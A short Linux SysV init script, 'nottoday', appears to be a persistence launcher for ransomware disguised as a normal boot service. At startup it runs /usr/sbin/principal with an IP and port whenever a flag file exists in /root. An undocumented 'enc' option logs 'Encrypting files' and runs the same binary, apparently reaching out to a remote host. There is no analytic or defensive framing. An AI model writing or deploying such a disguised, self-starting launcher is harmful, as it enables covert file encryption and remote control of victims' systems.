#! /bin/bash

### BEGIN INIT INFO
# Provides:          nottoday
# Required-Start:    $network
# Required-Stop:
# Default-Start:     2 3 4 5
# Default-Stop:
### END INIT INFO

#. /lib/lsb/init-functions

LOG_FILE="/var/log/nottoday.log"

echo "$(date): running" >> $LOG_FILE

case $1 in
    start|restart|force-reload)
        echo "$(date): $1 requested" >> $LOG_FILE

        if [ -f /root/flag.ntd ];then
            /usr/sbin/principal [IP] [PORT]
        fi
	;;
    stop)
	    echo "$(date): stopped requested. Nothing was done yet" >> $LOG_FILE
    ;;
    enc)
        echo "$(date): incident. Encrypting files" >> $LOG_FILE
        /usr/sbin/principal [IP] [PORT]
	;;
    status)
	    echo "$(date): status requested" >> $LOG_FILE
        exit 0
    ;;
    *)
        echo "Usage: $0 {start|stop|status|restart|force-reload}" >&2
        exit 3
    ;;

esac
